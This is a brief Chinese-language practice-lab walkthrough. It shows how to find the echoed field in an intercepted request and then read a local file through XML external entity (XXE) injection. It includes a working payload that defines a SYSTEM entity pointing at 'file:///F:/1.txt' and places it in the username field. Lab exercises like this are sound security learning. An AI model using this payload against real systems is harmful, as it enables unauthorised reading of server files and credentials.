我们的目的是利用靶场,读取到文件
1、先在自己的电脑上随便创建一个文件,这里我创建了一个1.txt文件,在我的f盘下
2、打开靶场
3、输入数值,抓包
4、发送到重放器找一下回显位
(1)当我们在username的位置上输入1时,页面渲染是1
(2)当我们在username的位置上输入2时,页面渲染是2,由此可以判断回显位在username这里
5、用xxe注入攻击
由于我们看到user的格式是xml格式的漏洞,所以我们尝试用xxe注入攻击
<?xml version="1.0"?>
<!DOCTYPE test [<!ENTITY name SYSTEM "file:///F:/1.txt">]>
<user>
<username>&name;</username>
<password>1</password>
</user>
这样结果就出来了